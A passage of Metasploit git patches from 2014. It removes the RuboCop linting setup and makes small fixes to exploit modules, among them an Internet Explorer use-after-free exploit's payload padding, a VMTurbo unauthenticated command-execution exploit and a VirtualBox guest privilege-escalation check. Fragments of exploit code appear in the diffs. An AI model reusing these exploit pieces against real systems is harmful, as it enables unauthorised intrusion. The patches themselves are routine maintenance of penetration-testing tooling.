-inherit_from: .rubocop_todo.yml
-
-Style/ClassLength:
-  Description: 'Most Metasploit modules are quite large. This is ok.'
-  Enabled: true
-  Exclude:
-    - 'modules/**/*'
-
-Style/Documentation:
-  Enabled: true
-  Description: 'Most Metasploit modules do not have class documentation.'
-  Exclude:
-    - 'modules/**/*'
-
-Style/Encoding:
-  Enabled: true
-  Description: 'We prefer binary to UTF-8.'
-  EnforcedStyle: 'when_needed'
-
-Style/LineLength:
-  Description: >-
-                  Metasploit modules often pattern match against very
-                  long strings when identifying targets.
-  Enabled: true
-  Max: 180
-
-Style/MethodLength:
-  Enabled: true
-  Description: >-
-                  While the style guide suggests 10 lines, exploit definitions
-                  often exceed 200 lines.
-  Max: 300
-
-Style/NumericLiterals:
-  Enabled: false
-  Description: 'This often hurts readability for exploit-ish code.'
-
-Style/PercentLiteralDelimiters:
-  Enabled: false
-  Description: >-
-                  Metasploit devs tend to prefer [] over %w() for
-                  nearly all cases, since we often deal with funny
-                  looking arrays of nonwords. Consistency here is
-                  preferred over element type safety.
-
-Style/WordArray:
-  Enabled: false
-  Description: >-
-                  Metasploit devs have grown comforatble with curly
-                  braces over parens for %w. Disabling this check
-                  prefers consistency.
diff --git a/.rubocop_todo.yml b/.rubocop_todo.yml
deleted file mode 100644
index 5f489f8f7d..0000000000
--- a/.rubocop_todo.yml
+++ /dev/null
@@ -1,730 +0,0 @@
-# This configuration was generated by `rubocop --auto-gen-config`
-# on 2014-07-29 16:18:04 -0500 using RuboCop version 0.23.0.
-# The point is for the user to remove these configuration records
-# one by one as the offenses are removed from the code base.
-# Note that changes in the inspected code, or installation of new
-# versions of RuboCop, may require this file to be generated again.
-
-# Offense count: 10
-Lint/AmbiguousOperator:
-  Enabled: false
-
-# Offense count: 8
-Lint/AmbiguousRegexpLiteral:
-  Enabled: false
-
-# Offense count: 1395
-# Configuration parameters: AllowSafeAssignment.
-Lint/AssignmentInCondition:
-  Enabled: false
-
-# Offense count: 105
-Lint/BlockAlignment:
-  Enabled: false
-
-# Offense count: 7
-Lint/ConditionPosition:
-  Enabled: false
-
-# Offense count: 119
-# Cop supports --auto-correct.
-Lint/DeprecatedClassMethods:
-  Enabled: false
-
-# Offense count: 5
-Lint/ElseLayout:
-  Enabled: false
-
-# Offense count: 1
-Lint/EmptyInterpolation:
-  Enabled: false
-
-# Offense count: 746
-# Configuration parameters: AlignWith, SupportedStyles.
-Lint/EndAlignment:
-  Enabled: false
-
-# Offense count: 3
-Lint/EnsureReturn:
-  Enabled: false
-
-# Offense count: 43
-Lint/Eval:
-  Enabled: false
-
-# Offense count: 586
-Lint/HandleExceptions:
-  Enabled: false
-
-# Offense count: 107
-Lint/LiteralInCondition:
-  Enabled: false
-
-# Offense count: 8
-Lint/LiteralInInterpolation:
-  Enabled: false
-
-# Offense count: 30
-Lint/Loop:
-  Enabled: false
-
-# Offense count: 51
-Lint/ParenthesesAsGroupedExpression:
-  Enabled: false
-
-# Offense count: 2
-Lint/RequireParentheses:
-  Enabled: false
-
-# Offense count: 526
-# Cop supports --auto-correct.
-Lint/RescueException:
-  Enabled: false
-
-# Offense count: 82
-Lint/ShadowingOuterLocalVariable:
-  Enabled: false
-
-# Offense count: 19
-Lint/SpaceBeforeFirstArg:
-  Enabled: false
-
-# Offense count: 395
-# Cop supports --auto-correct.
-Lint/StringConversionInInterpolation:
-  Enabled: false
-
-# Offense count: 83
-Lint/UnderscorePrefixedVariableName:
-  Enabled: false
-
-# Offense count: 18
-Lint/UnreachableCode:
-  Enabled: false
-
-# Offense count: 950
-# Cop supports --auto-correct.
-Lint/UnusedBlockArgument:
-  Enabled: false
-
-# Offense count: 1554
-# Cop supports --auto-correct.
-Lint/UnusedMethodArgument:
-  Enabled: false
-
-# Offense count: 21
-Lint/UselessAccessModifier:
-  Enabled: false
-
-# Offense count: 2236
-Lint/UselessAssignment:
-  Enabled: false
-
-# Offense count: 1
-Lint/UselessComparison:
-  Enabled: false
-
-# Offense count: 4
-Lint/UselessSetterCall:
-  Enabled: false
-
-# Offense count: 131
-Lint/Void:
-  Enabled: false
-
-# Offense count: 178
-# Cop supports --auto-correct.
-# Configuration parameters: EnforcedStyle, SupportedStyles.
-Style/AccessModifierIndentation:
-  Enabled: false
-
-# Offense count: 346
-Style/AccessorMethodName:
-  Enabled: false
-
-# Offense count: 195
-# Cop supports --auto-correct.
-Style/Alias:
-  Enabled: false
-
-# Offense count: 1007
-# Cop supports --auto-correct.
-Style/AlignArray:
-  Enabled: false
-
-# Offense count: 1205
-# Cop supports --auto-correct.
-# Configuration parameters: EnforcedHashRocketStyle, EnforcedColonStyle, EnforcedLastArgumentHashStyle, SupportedLastArgumentHashStyles.
-Style/AlignHash:
-  Enabled: false
-
-# Offense count: 2822
-# Cop supports --auto-correct.
-# Configuration parameters: EnforcedStyle, SupportedStyles.
-Style/AlignParameters:
-  Enabled: false
-
-# Offense count: 9507
-# Cop supports --auto-correct.
-Style/AndOr:
-  Enabled: false
-
-# Offense count: 9
-Style/AsciiComments:
-  Enabled: false
-
-# Offense count: 193
-# Cop supports --auto-correct.
-Style/BlockComments:
-  Enabled: false
-
-# Offense count: 841
-Style/BlockNesting:
-  Max: 8
-
-# Offense count: 3258
-# Cop supports --auto-correct.
-Style/Blocks:
-  Enabled: false
-
-# Offense count: 2245
-# Cop supports --auto-correct.
-# Configuration parameters: EnforcedStyle, SupportedStyles.
-Style/BracesAroundHashParameters:
-  Enabled: false
-
-# Offense count: 17
-Style/CaseEquality:
-  Enabled: false
-
-# Offense count: 1843
-# Configuration parameters: IndentWhenRelativeTo, SupportedStyles, IndentOneStep.
-Style/CaseIndentation:
-  Enabled: false
-
-# Offense count: 562
-# Cop supports --auto-correct.
-Style/CharacterLiteral:
-  Enabled: false
-
-# Offense count: 80
-Style/ClassAndModuleCamelCase:
-  Enabled: false
-
-# Offense count: 309
-# Configuration parameters: EnforcedStyle, SupportedStyles.
-Style/ClassAndModuleChildren:
-  Enabled: false
-
-# Offense count: 352
-# Configuration parameters: CountComments.
-Style/ClassLength:
-  Max: 38107
-
-# Offense count: 203
-# Cop supports --auto-correct.
-Style/ClassMethods:
-  Enabled: false
-
-# Offense count: 311
-Style/ClassVars:
-  Enabled: false
-
-# Offense count: 364
-# Cop supports --auto-correct.
-# Configuration parameters: PreferredMethods.
-Style/CollectionMethods:
-  Enabled: false
-
-# Offense count: 315
-# Cop supports --auto-correct.
-Style/ColonMethodCall:
-  Enabled: false
-
-# Offense count: 233
-# Configuration parameters: Keywords.
-Style/CommentAnnotation:
-  Enabled: false
-
-# Offense count: 375
-# Cop supports --auto-correct.
-Style/CommentIndentation:
-  Enabled: false
-
-# Offense count: 450
-Style/ConstantName:
-  Enabled: false
-
-# Offense count: 2713
-Style/CyclomaticComplexity:
-  Max: 259
-
-# Offense count: 275
-# Cop supports --auto-correct.
-Style/DefWithParentheses:
-  Enabled: false
-
-# Offense count: 159
-# Cop supports --auto-correct.
-Style/DeprecatedHashMethods:
-  Enabled: false
-
-# Offense count: 1455
-Style/Documentation:
-  Enabled: false
-
-# Offense count: 18
-# Configuration parameters: EnforcedStyle, SupportedStyles.
-Style/DotPosition:
-  Enabled: false
-
-# Offense count: 70
-Style/DoubleNegation:
-  Enabled: false
-
-# Offense count: 16
-Style/EachWithObject:
-  Enabled: false
-
-# Offense count: 490
-# Cop supports --auto-correct.
-# Configuration parameters: AllowAdjacentOneLineDefs.
-Style/EmptyLineBetweenDefs:
-  Enabled: false
-
-# Offense count: 3753
-# Cop supports --auto-correct.
-Style/EmptyLines:
-  Enabled: false
-
-# Offense count: 64
-Style/EmptyLinesAroundAccessModifier:
-  Enabled: false
-
-# Offense count: 8506
-# Cop supports --auto-correct.
-Style/EmptyLinesAroundBody:
-  Enabled: false
-
-# Offense count: 164
-# Cop supports --auto-correct.
-Style/EmptyLiteral:
-  Enabled: false
-
-# Offense count: 10
-# Configuration parameters: EnforcedStyle, SupportedStyles.
-Style/Encoding:
-  Enabled: false
-
-# Offense count: 1
-Style/EndBlock:
-  Enabled: false
-
-# Offense count: 1
-Style/EndOfLine:
-  Enabled: false
-
-# Offense count: 26
-Style/EvenOdd:
-  Enabled: false
-
-# Offense count: 44
-# Configuration parameters: Exclude.
-Style/FileName:
-  Enabled: false
-
-# Offense count: 108
-# Configuration parameters: EnforcedStyle, SupportedStyles.
-Style/For:
-  Enabled: false
-
-# Offense count: 981
-# Configuration parameters: EnforcedStyle, SupportedStyles.
-Style/FormatString:
-  Enabled: false
-
-# Offense count: 243
-# Configuration parameters: AllowedVariables.
-Style/GlobalVars:
-  Enabled: false
-
-# Offense count: 727
-# Configuration parameters: MinBodyLength.
-Style/GuardClause:
-  Enabled: false
-
-# Offense count: 11295
-# Cop supports --auto-correct.
-# Configuration parameters: EnforcedStyle, SupportedStyles.
-Style/HashSyntax:
-  Enabled: false
-
-# Offense count: 2551
-# Configuration parameters: MaxLineLength.
-Style/IfUnlessModifier:
-  Enabled: false
-
-# Offense count: 82
-Style/IfWithSemicolon:
-  Enabled: false
-
-# Offense count: 2056
-# Cop supports --auto-correct.
-Style/IndentArray:
-  Enabled: false
-
-# Offense count: 3023
-# Cop supports --auto-correct.
-# Configuration parameters: EnforcedStyle, SupportedStyles.
-Style/IndentHash:
-  Enabled: false
-
-# Offense count: 1257
-# Cop supports --auto-correct.
-Style/IndentationConsistency:
-  Enabled: false
-
-# Offense count: 4705
-# Cop supports --auto-correct.
-Style/IndentationWidth:
-  Enabled: false
-
-# Offense count: 302
-Style/Lambda:
-  Enabled: false
-
-# Offense count: 4664
-# Cop supports --auto-correct.
-Style/LeadingCommentSpace:
-  Enabled: false
-
-# Offense count: 3304
-# Cop supports --auto-correct.
-Style/LineEndConcatenation:
-  Enabled: false
-
-# Offense count: 127
-Style/LineLength:
-  Max: 5614
-
-# Offense count: 1480
-# Cop supports --auto-correct.
-Style/MethodCallParentheses:
-  Enabled: false
-
-# Offense count: 28
-# Cop supports --auto-correct.
-# Configuration parameters: EnforcedStyle, SupportedStyles.
-Style/MethodDefParentheses:
-  Enabled: false
-
-# Offense count: 22
-# Configuration parameters: CountComments.
-Style/MethodLength:
-  Max: 38090
-
-# Offense count: 278
-# Configuration parameters: EnforcedStyle, SupportedStyles.
-Style/MethodName:
-  Enabled: false
-
-# Offense count: 27
-Style/MultilineBlockChain:
-  Enabled: false
-
-# Offense count: 93
-Style/MultilineIfThen:
-  Enabled: false
-
-# Offense count: 19
-Style/MultilineTernaryOperator:
-  Enabled: false
-
-# Offense count: 3497
-# Cop supports --auto-correct.
-Style/NegatedIf:
-  Enabled: false
-
-# Offense count: 85
-# Cop supports --auto-correct.
-Style/NegatedWhile:
-  Enabled: false
-
-# Offense count: 53
-Style/NestedTernaryOperator:
-  Enabled: false
-
-# Offense count: 972
-# Configuration parameters: EnforcedStyle, SupportedStyles.
-Style/Next:
-  Enabled: false
-
-# Offense count: 587
-# Cop supports --auto-correct.
-Style/NilComparison:
-  Enabled: false
-
-# Offense count: 311
-# Cop supports --auto-correct.
-# Configuration parameters: IncludeSemanticChanges.
-Style/NonNilCheck:
-  Enabled: false
-
-# Offense count: 5052
-# Cop supports --auto-correct.
-Style/Not:
-  Enabled: false
-
-# Offense count: 72
-Style/OneLineConditional:
-  Enabled: false
-
-# Offense count: 28
-Style/OpMethod:
-  Enabled: false
-
-# Offense count: 94
-# Configuration parameters: CountKeywordArgs.
-Style/ParameterLists:
-  Max: 14
-
-# Offense count: 3567
-# Cop supports --auto-correct.
-# Configuration parameters: AllowSafeAssignment.
-Style/ParenthesesAroundCondition:
-  Enabled: false
-
-# Offense count: 1030
-# Cop supports --auto-correct.
-Style/PerlBackrefs:
-  Enabled: false
-
-# Offense count: 154
-# Configuration parameters: NamePrefixBlacklist.
-Style/PredicateName:
-  Enabled: false
-
-# Offense count: 165
-# Cop supports --auto-correct.
-Style/Proc:
-  Enabled: false
-
-# Offense count: 100
-# Configuration parameters: EnforcedStyle, SupportedStyles.
-Style/RaiseArgs:
-  Enabled: false
-
-# Offense count: 286
-# Cop supports --auto-correct.
-Style/RedundantBegin:
-  Enabled: false
-
-# Offense count: 269
-Style/RedundantException:
-  Enabled: false
-
-# Offense count: 3440
-# Cop supports --auto-correct.
-# Configuration parameters: AllowMultipleReturnValues.
-Style/RedundantReturn:
-  Enabled: false
-
-# Offense count: 3162
-# Cop supports --auto-correct.
-Style/RedundantSelf:
-  Enabled: false
-
-# Offense count: 237
-# Configuration parameters: MaxSlashes.
-Style/RegexpLiteral:
-  Enabled: false
-
-# Offense count: 349
-Style/RescueModifier:
-  Enabled: false
-
-# Offense count: 203
-Style/SelfAssignment:
-  Enabled: false
-
-# Offense count: 485
-# Cop supports --auto-correct.
-# Configuration parameters: AllowAsExpressionSeparator.
-Style/Semicolon:
-  Enabled: false
-
-# Offense count: 2468
-# Cop supports --auto-correct.
-# Configuration parameters: EnforcedStyle, SupportedStyles.
-Style/SignalException:
-  Enabled: false
-
-# Offense count: 126
-# Configuration parameters: Methods.
-Style/SingleLineBlockParams:
-  Enabled: false
-
-# Offense count: 480
-# Cop supports --auto-correct.
-# Configuration parameters: AllowIfMethodIsEmpty.
-Style/SingleLineMethods:
-  Enabled: false
-
-# Offense count: 482
-# Cop supports --auto-correct.
-Style/SingleSpaceBeforeFirstArg:
-  Enabled: false
-
-# Offense count: 8
-# Cop supports --auto-correct.
-Style/SpaceAfterColon:
-  Enabled: false
-
-# Offense count: 66361
-# Cop supports --auto-correct.
-Style/SpaceAfterComma:
-  Enabled: false
-
-# Offense count: 1387
-# Cop supports --auto-correct.
-Style/SpaceAfterControlKeyword:
-  Enabled: false
-
-# Offense count: 35
-# Cop supports --auto-correct.
-Style/SpaceAfterMethodName:
-  Enabled: false
-
-# Offense count: 154
-# Cop supports --auto-correct.
-Style/SpaceAfterNot:
-  Enabled: false
-
-# Offense count: 2
-# Cop supports --auto-correct.
-Style/SpaceAfterSemicolon:
-  Enabled: false
-
-# Offense count: 2592
-# Cop supports --auto-correct.
-# Configuration parameters: EnforcedStyle, SupportedStyles.
-Style/SpaceAroundEqualsInParameterDefault:
-  Enabled: false
-
-# Offense count: 9743
-# Cop supports --auto-correct.
-Style/SpaceAroundOperators:
-  Enabled: false
-
-# Offense count: 390
-# Cop supports --auto-correct.
-# Configuration parameters: EnforcedStyle, SupportedStyles.
-Style/SpaceBeforeBlockBraces:
-  Enabled: false
-
-# Offense count: 1297
-# Cop supports --auto-correct.
-Style/SpaceBeforeComment:
-  Enabled: false
-
-# Offense count: 7
-# Cop supports --auto-correct.
-Style/SpaceBeforeModifierKeyword:
-  Enabled: false
-
-# Offense count: 1342
-# Cop supports --auto-correct.
-# Configuration parameters: EnforcedStyle, SupportedStyles, EnforcedStyleForEmptyBraces, SpaceBeforeBlockParameters.
-Style/SpaceInsideBlockBraces:
-  Enabled: false
-
-# Offense count: 24964
-# Cop supports --auto-correct.
-Style/SpaceInsideBrackets:
-  Enabled: false
-
-# Offense count: 2807
-# Cop supports --auto-correct.
-# Configuration parameters: EnforcedStyle, EnforcedStyleForEmptyBraces, SupportedStyles.
-Style/SpaceInsideHashLiteralBraces:
-  Enabled: false
-
-# Offense count: 5223
-# Cop supports --auto-correct.
-Style/SpaceInsideParens:
-  Enabled: false
-
-# Offense count: 729
-# Cop supports --auto-correct.
-Style/SpecialGlobalVars:
-  Enabled: false
-
-# Offense count: 111166
-# Cop supports --auto-correct.
-# Configuration parameters: EnforcedStyle, SupportedStyles.
-Style/StringLiterals:
-  Enabled: false
-
-# Offense count: 382
-Style/Tab:
-  Enabled: false
-
-# Offense count: 568
-# Cop supports --auto-correct.
-# Configuration parameters: EnforcedStyle, SupportedStyles.
-Style/TrailingBlankLines:
-  Enabled: false
-
-# Offense count: 6257
-# Configuration parameters: EnforcedStyleForMultiline, SupportedStyles.
-Style/TrailingComma:
-  Enabled: false
-
-# Offense count: 1803
-# Cop supports --auto-correct.
-Style/TrailingWhitespace:
-  Enabled: false
-
-# Offense count: 141
-# Cop supports --auto-correct.
-# Configuration parameters: ExactNameMatch, AllowPredicates, AllowDSLWriters, Whitelist.
-Style/TrivialAccessors:
-  Enabled: false
-
-# Offense count: 22
-Style/UnlessElse:
-  Enabled: false
-
-# Offense count: 216
-Style/UnneededCapitalW:
-  Enabled: false
-
-# Offense count: 13
-# Cop supports --auto-correct.
-Style/UnneededPercentX:
-  Enabled: false
-
-# Offense count: 93
-# Cop supports --auto-correct.
-Style/VariableInterpolation:
-  Enabled: false
-
-# Offense count: 740
-# Configuration parameters: EnforcedStyle, SupportedStyles.
-Style/VariableName:
-  Enabled: false
-
-# Offense count: 1520
-# Cop supports --auto-correct.
-Style/WhenThen:
-  Enabled: false
-
-# Offense count: 33
-# Cop supports --auto-correct.
-Style/WhileUntilDo:
-  Enabled: false
-
-# Offense count: 129
-# Configuration parameters: MaxLineLength.
-Style/WhileUntilModifier:
-  Enabled: false
diff --git a/Gemfile b/Gemfile
index a5a71b8d46..03c7fe7a01 100755
--- a/Gemfile
+++ b/Gemfile
@@ -37,8 +37,6 @@ group :pcap do
 end
 
 group :development do
-  # Style/sanity checking Ruby code
-  gem 'rubocop'
   # Markdown formatting for yard
   gem 'redcarpet'
   # generating documentation
diff --git a/tools/msftidy.rb b/tools/msftidy.rb
index 7215f79b07..cee49583d0 100755
--- a/tools/msftidy.rb
+++ b/tools/msftidy.rb
@@ -335,15 +335,6 @@ class Msftidy
     end
   end
 
-  # Explicitly skip this check if we're suppressing info messages
-  # anyway, since it takes a fair amount of time per module to perform.
-  def check_rubocop
-    return true if SUPPRESS_INFO_MESSAGES
-    out = %x{rubocop -n #{@full_filepath}}
-    ret = $?
-    info("Fails to pass Rubocop Ruby style guidelines (run 'rubocop #{@full_filepath}' to see violations)") unless ret.exitstatus == 0
-  end
-
   def check_old_rubies
     return true unless CHECK_OLD_RUBIES
     return true unless Object.const_defined? :RVM
@@ -611,7 +602,6 @@ def run_checks(full_filepath)
   tidy.check_vuln_codes
   tidy.check_vars_get
   tidy.check_newline_eof
-  tidy.check_rubocop
   tidy.check_sock_get
   tidy.check_udp_sock_get
   return tidy

From 042423088cdef86430a00ac90f4a3d009ff67b26 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 12 Aug 2014 11:41:29 -0500
Subject: [PATCH 282/321] Make sure which the full payload is used

---
 modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb
index adcefa77fe..cfa2567ea6 100644
--- a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb
+++ b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb
@@ -108,7 +108,13 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit_template(cli, target_info)
 
     flash_payload = ""
-    get_payload(cli,target_info).unpack("V*").each do |i|
+    padded_payload = get_payload(cli,target_info)
+
+    while padded_payload.length % 4 != 0
+      padded_payload += "\x00"
+    end
+
+    padded_payload.unpack("V*").each do |i|
       flash_payload << "0x#{i.to_s(16)},"
     end
     flash_payload.gsub!(/,$/, "")

From 3af17ffad01431885d2b5679a13a622c36f827dd Mon Sep 17 00:00:00 2001
From: Emilio Pinna <emilio.pinn@gmail.com>
Date: Tue, 12 Aug 2014 19:24:24 +0200
Subject: [PATCH 283/321] Fixed 'execute_command()' missing 'opts' parameter

---
 modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
index 41a0d9743f..809be43312 100644
--- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
+++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
   end
 
-  def execute_command(cmd, opts)
+  def execute_command(cmd, opts = {})
     begin
     res = send_request_cgi({
       'uri'    => '/cgi-bin/vmtadmin.cgi',

From bbcd63cd10499c180e9cbbf950ec49afdd08daee Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Tue, 12 Aug 2014 12:28:22 -0500
Subject: [PATCH 284/321] Update Gemfile.lock as well for PR #3639

---
 Gemfile.lock | 15 ---------------
 1 file changed, 15 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index 0ae4dcf18e..2fae393140 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -13,7 +13,6 @@ GEM
       i18n (~> 0.6, >= 0.6.4)
       multi_json (~> 1.0)
     arel (3.0.2)
-    ast (2.0.0)
     bcrypt (3.1.7)
     builder (3.0.4)
     database_cleaner (1.1.1)
@@ -35,13 +34,8 @@ GEM
     nokogiri (1.6.0)
       mini_portile (~> 0.5.0)
     packetfu (1.1.9)
-    parser (2.1.9)
-      ast (>= 1.1, < 3.0)
-      slop (~> 3.4, >= 3.4.5)
     pcaprub (0.11.3)
     pg (0.16.0)
-    powerpack (0.0.9)
-    rainbow (2.0.0)
     rake (10.1.0)
     redcarpet (3.0.0)
     rkelly-remix (0.0.6)
@@ -54,20 +48,12 @@ GEM
     rspec-expectations (2.14.2)
       diff-lcs (>= 1.1.3, < 2.0)
     rspec-mocks (2.14.3)
-    rubocop (0.23.0)
-      json (>= 1.7.7, < 2)
-      parser (~> 2.1.9)
-      powerpack (~> 0.0.6)
-      rainbow (>= 1.99.1, < 3.0)
-      ruby-progressbar (~> 1.4)
-    ruby-progressbar (1.5.1)
     shoulda-matchers (2.3.0)
       activesupport (>= 3.0.0)
     simplecov (0.5.4)
       multi_json (~> 1.0.3)
       simplecov-html (~> 0.5.3)
     simplecov-html (0.5.3)
-    slop (3.5.0)
     sqlite3 (1.3.9)
     timecop (0.6.3)
     tzinfo (0.3.37)
@@ -97,7 +83,6 @@ DEPENDENCIES
   rkelly-remix (= 0.0.6)
   robots
   rspec (>= 2.12)
-  rubocop
   shoulda-matchers
   simplecov (= 0.5.4)
   sqlite3

From 5b6be55c50c3ba3749071a77e17503bcb88102f7 Mon Sep 17 00:00:00 2001
From: Emilio Pinna <emilio.pinn@gmail.com>
Date: Tue, 12 Aug 2014 19:49:27 +0200
Subject: [PATCH 285/321] Fix (properly) 'execute_command()' missing 'opts'
 parameter

---
 modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
index 809be43312..59b1c9d586 100644
--- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
+++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
   end
 
-  def execute_command(cmd, opts = {})
+  def execute_command(cmd, opts)
     begin
     res = send_request_cgi({
       'uri'    => '/cgi-bin/vmtadmin.cgi',
@@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
     # Handle single command shot
     if target.name =~ /CMD/
       cmd = payload.encoded
-      res = execute_command(cmd)
+      res = execute_command(cmd, {})
 
       unless res
         fail_with(Failure::Unknown, "#{peer} - Unable to execute payload")

From 33da1a687167d5f3c408d7944565e1b11fe46abb Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 12 Aug 2014 13:49:39 -0500
Subject: [PATCH 286/321] Give a chance to the mixin

---
 modules/auxiliary/scanner/smb/smb_enumusers.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/auxiliary/scanner/smb/smb_enumusers.rb b/modules/auxiliary/scanner/smb/smb_enumusers.rb
index c9d6978bf8..8e4f726ae9 100644
--- a/modules/auxiliary/scanner/smb/smb_enumusers.rb
+++ b/modules/auxiliary/scanner/smb/smb_enumusers.rb
@@ -34,11 +34,11 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def rport
-    @rport
+    @rport || super
   end
 
   def smb_direct
-    @smbdirect
+    @smbdirect || super
   end
 
   # Locate an available SMB PIPE for the specified service

From 9e38ffb7979b139c1f7e2abeb20450cfac9c0348 Mon Sep 17 00:00:00 2001
From: Emilio Pinna <emilio.pinn@gmail.com>
Date: Tue, 12 Aug 2014 21:55:42 +0200
Subject: [PATCH 287/321] Add the check for the manual payload setting

---
 .../unix/http/vmturbo_vmtadmin_exec_noauth.rb       | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
index 59b1c9d586..6536b737df 100644
--- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
+++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -10,6 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
+  include Msf::Exploit::EXE
 
   def initialize(info = {})
     super(update_info(info,
@@ -118,6 +119,16 @@ class Metasploit3 < Msf::Exploit::Remote
     vprint_status("Sent command #{cmd}")
   end
 
+  #
+  # generate_payload_exe doesn't respect module's platform unless it's Windows, or the user
+  # manually sets one. This method is a temp work-around.
+  #
+  def check_generate_payload_exe
+    if generate_payload_exe.nil?
+      fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF. Please manually set a payload.")
+    end
+  end
+
   def exploit
 
     # Handle single command shot
@@ -133,6 +144,8 @@ class Metasploit3 < Msf::Exploit::Remote
       return
     end
 
+    check_generate_payload_exe
+
     # Handle payload upload using CmdStager mixin
     execute_cmdstager({:flavor => :printf})
   end

From 3440f82b2e4f986e320ca1f9c5406b5e76175b46 Mon Sep 17 00:00:00 2001
From: Emilio Pinna <emilio.pinn@gmail.com>
Date: Tue, 12 Aug 2014 22:18:59 +0200
Subject: [PATCH 288/321] Minor description adjustment

---
 modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
index 6536b737df..8779712082 100644
--- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
+++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -22,8 +22,8 @@ class Metasploit3 < Msf::Exploit::Remote
           there is no output for the executed command when using the cmd generic payload.
           Port binding payloads are disregarded due to the restrictive firewall settings.
 
-          This module has been tested successfully on VMTurbo Operations Manager 4.5 and
-          VMTurbo Operations Manager 4.6.
+          This module has been tested successfully on VMTurbo Operations Manager versions 4.5 and
+          4.6.
       },
       'Author'      =>
         [

From ea3d2f727b7f0e862da8636459710bc87e2707c5 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 12 Aug 2014 16:09:59 -0500
Subject: [PATCH 289/321] Dont fail_with while checking

---
 modules/exploits/windows/local/vbox_guest.rb | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/windows/local/vbox_guest.rb b/modules/exploits/windows/local/vbox_guest.rb
index d34b8a8ada..8be5ef63d4 100644
--- a/modules/exploits/windows/local/vbox_guest.rb
+++ b/modules/exploits/windows/local/vbox_guest.rb
@@ -206,9 +206,10 @@ class Metasploit3 < Msf::Exploit::Local
     end
 
     file_path = expand_path("%windir%") << "\\system32\\drivers\\vboxguest.sys"
-    if !file?(file_path)
-      fail_with(Failure::Unknown, "VBoxGuest.sys file does not exist in the default location") 
+    unless file?(file_path)
+      return Exploit::CheckCode::Unknown
     end
+
     major, minor, build, revision, branch = file_version(file_path)
     vprint_status("vboxguest.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
 

From c8e4048c19a83653c364e0e7ac74833ac2c611bd Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 12 Aug 2014 16:11:31 -0500
Subject: [PATCH 290/321] Some style fixes

---
 modules/exploits/windows/local/vbox_guest.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/windows/local/vbox_guest.rb b/modules/exploits/windows/local/vbox_guest.rb
index 8be5ef63d4..384857ac6d 100644
--- a/modules/exploits/windows/local/vbox_guest.rb
+++ b/modules/exploits/windows/local/vbox_guest.rb
@@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Local
     addresses.each do |address|
       results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
       current_drvname = results['lpBaseName'][0, results['return']]
-      if drvname == nil
+      if drvname.nil?
         if current_drvname.downcase.include?('krnl')
           return [address, current_drvname]
         end
@@ -287,7 +287,7 @@ class Metasploit3 < Msf::Exploit::Local
 
     print_status("Checking privileges after exploitation...")
 
-    if not is_system?
+    unless is_system?
       fail_with(Failure::Unknown, "The exploitation wasn't successful")
     else
       print_good("Exploitation successful!")

From 183b27ee27c95973f8c73a8182c7971f14938dab Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 12 Aug 2014 16:14:41 -0500
